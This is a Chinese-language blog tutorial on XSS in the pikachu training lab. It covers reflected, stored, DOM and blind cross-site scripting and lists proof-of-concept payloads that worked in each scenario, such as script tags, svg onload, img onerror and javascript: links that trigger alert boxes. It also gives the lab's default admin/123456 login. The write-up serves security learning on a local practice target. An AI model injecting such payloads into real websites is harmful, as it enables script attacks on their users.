Web漏洞-XSS實驗-pikachu靶場5個場景(二)

★★實戰前置聲明★★
文章中涉及的程序(方法)可能帶有攻擊性,僅供安全研究與學習之用,讀者將其信息做其他用途,由用戶承擔全部法律及連帶責任,文章作者不承擔任何法律及連帶責任。

1、前言

上一篇《Web漏洞-XSS理論和靶場小試牛刀(一)》已經介紹了XSS一些理論知識點,本文主要是分享pikachu靶場XSS攻擊的3個類型5個場景:反射型xss(post)、存儲型xss、DOM型xss、DOM型xss-x和xss之盲打。攻擊思路是怎麼樣的,爲什麼使用這個poc。

2、反射型xss(post)

2.0、該驗證需登錄

注意:該驗證需要先用戶登錄完纔可操作,賬戶名/密碼:admin/123456,可以右擊上方提示。

2.1、正常操作

輸入'<>?"&/6666,界面顯示如下:

2.2、查看源碼

按F2看源碼,發現輸入的內容直接回顯,且放在p標籤內,輸入框也沒有長度限制。

2.3、確定攻擊poc

攻擊poc選擇就比較多,以下是我驗證通過的poc

<script>alert(1)</script>
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<M onmouseover=alert(1)>M
<a href=javascript:alert(1) >xss</a>
<a href="" onclick="alert(1)">xss</a>

3、存儲型xss

3.1、正常操作

輸入'<>?"&/6666,界面顯示如下:

3.2、查看源碼

按F2看源碼,發現輸入的內容直接回顯,且放在p標籤內,輸入框也沒有長度限制。

3.3、確定攻擊poc

攻擊poc選擇就比較多,以下是驗證通過的poc

<script>alert(1)</script>
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<M onmouseover=alert(1)>M
<a href=javascript:alert(1) >xss</a>
<a href="" onclick="alert(1)">xss</a>

4、DOM型xss

4.1、正常操作

輸入'<>?"&/6666,發現顯示有點奇怪,調整成輸入123,界面顯示如下:


4.2、查看源碼

按F2看源碼,發現輸入的內容,是填充在a標籤的href內,沒有編碼,href是用雙引號的。

確定是否有編碼是通過輸入'<>?"&/6666,按F12看源碼的。

4.3、確定攻擊poc

攻擊poc就可以採用a標籤彈窗方式的語句了

<a href=javascript:alert('xss') > xss</a>

注意:只取href裏面的部分,且alert()的內容需要用雙引號,或者用數字的方式。

驗證成功的poc

javascript:alert("test")
javascript:alert(1)

5、DOM型xss-x

5.1、正常操作

輸入'<>?"&/6666,發現顯示有點奇怪,調整成輸入123,界面顯示如下:

5.2、查看源碼

按F2看源碼,發現輸入的內容,是填充在a標籤的href內,沒有編碼,href是用雙引號的。

圖示包含在5.1裏面了,不再單獨截圖

5.3、確定攻擊poc

攻擊poc就可以採用a標籤彈窗方式的語句了

<a href=javascript:alert('xss') > xss</a>

注意:只取href裏面的部分,且alert()的內容需要用雙引號,或者用數字的方式。

驗證成功的poc

javascript:alert("test")
javascript:alert(1)

6、xss之盲打

6.1、正常操作

一次輸入正常的內容,一次輸入'<>?"&/6666,按F12在當前頁都沒發現提交後相關信息,提交頁面的兩個輸入框長度沒有限制。

點右上方“點一下提示~”,

訪問:
http://127.0.0.1/pikachu/vul/xss/xssblind/admin_login.php
輸入pikachu的默認用戶名和密碼:admin / 123456
跳轉到頁面:http://127.0.0.1/pikachu/vul/xss/xssblind/admin.php
是剛纔提交的結果列表頁

界面顯示如下:

6.2、查看源碼

按F2看源碼,發現輸入的內容,是列表展示是在表格td標籤內,沒有編碼。

6.3、確定攻擊poc

攻擊poc選擇就比較多,以下是驗證通過的poc

<script>alert(1)</script>
<svg onload=alert(1)>
<img src=1 onerror=alert(1)>
<M onmouseover=alert(1)>M
<a href=javascript:alert(1) >xss</a>
<a href="" onclick="alert(1)">xss</a>


7、資料獲取

靶場環境搭建請參考《靶場環境搭建【XP、pikachu、dvwa、sqli-labs】》

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章